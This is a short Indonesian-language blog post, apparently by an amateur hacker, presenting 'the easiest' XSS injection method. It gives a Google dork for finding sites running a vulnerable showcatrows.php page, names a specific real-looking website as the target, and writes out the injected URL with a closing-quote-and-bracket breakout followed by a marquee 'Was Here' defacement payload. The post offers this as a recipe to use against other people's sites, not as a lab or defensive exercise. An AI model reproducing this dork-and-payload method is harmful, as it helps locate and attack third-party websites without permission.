Untuk postingan pertama saya ini, saya mau coba menjelasankan cara yang paling mudah dengan injeksi XSS yaitu :
1. Anda cukup memasukan dork pada pencarian google : inurl:"/showcatrows.php?CategoryID="
2. Setelah menemukan target. kemudian anda injek dengan scripts html diblekang situs itu. sebagai contoh saya dapatkan target http://2muchvector.com/showcatrows.php?CategoryID=41, kemuadian kita inject pake skript tulisan berjalan, skripts saya <marquee><h1>Ravaz Cyber Was Here<h1></marquee> nah diantara url sama skripts kita, kita tambahin dengan "> . Jadi Urlnya adalah http://2muchvector.com/showcatrows.php?CategoryID=41"><marquee><h1>Ravaz Cyber Was Here<h1></marquee>
Demikian postingan pertama saya
/F4r1z4l
ConversionConversion EmoticonEmoticon